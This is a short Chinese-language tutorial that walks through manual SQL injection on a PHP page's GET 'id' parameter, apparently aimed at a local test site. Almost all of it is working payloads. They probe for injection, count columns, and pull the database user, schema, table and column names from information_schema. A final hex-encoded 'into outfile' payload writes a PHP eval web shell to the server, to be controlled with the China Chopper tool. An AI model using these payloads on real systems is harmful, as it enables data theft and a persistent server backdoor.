一个带get型参数并且存在从数据库中返回数据的网站:
http://127.0.0.1/index.php?id=1
可以进行如下尝试检测是否存在注入点:
http://127.0.0.1/index.php?id=1 and 1=1
http://127.0.0.1/index.php?id=1 and 1=2
http://127.0.0.1/index.php?id=1'order by 1%23
http://127.0.0.1/index.php?id=1'order by 2%23
一直到报错...
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 %23
得到显示字段2
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,user(),3 %23
查看当前数据库的账户的权限
爆库名:
http://127.0.0.1/index.php?id=1' and1=2 union select 1,group_concat(distinct schema_name),3 frominformation_schema.schemata %23
爆表名:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct table_name),3 from information_schema.tables where table_schema=database()%23
爆字段名:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct column_name),3 from information_schema.columns where table_schema=database() and table_name=0x6269616f6d696e67%23
注:
0x6269616f6d696e67为表名的十六进制;
这里可以直接使用firefox的hackbar插件直接转换;
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,group_concat(distinct ziduan_name),3 from table_name%23
注:
ziduan_name为要查询的字段名;
table_name为表名;
利用get注入写入一句话木马:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,0x3c3f70687020406576616c28245f504f53545b3132335d293b3f3e,3 into outfile 'C:\\WWW\\shell.php'%23
注:
0x3c3f70687020406576616c28245f504f53545b3132335d293b3f3e为<?php @eval($_POST[123]);?>的十六进制C:\WWW\shell.php为服务器绝对路径
接着使用菜刀连接即可。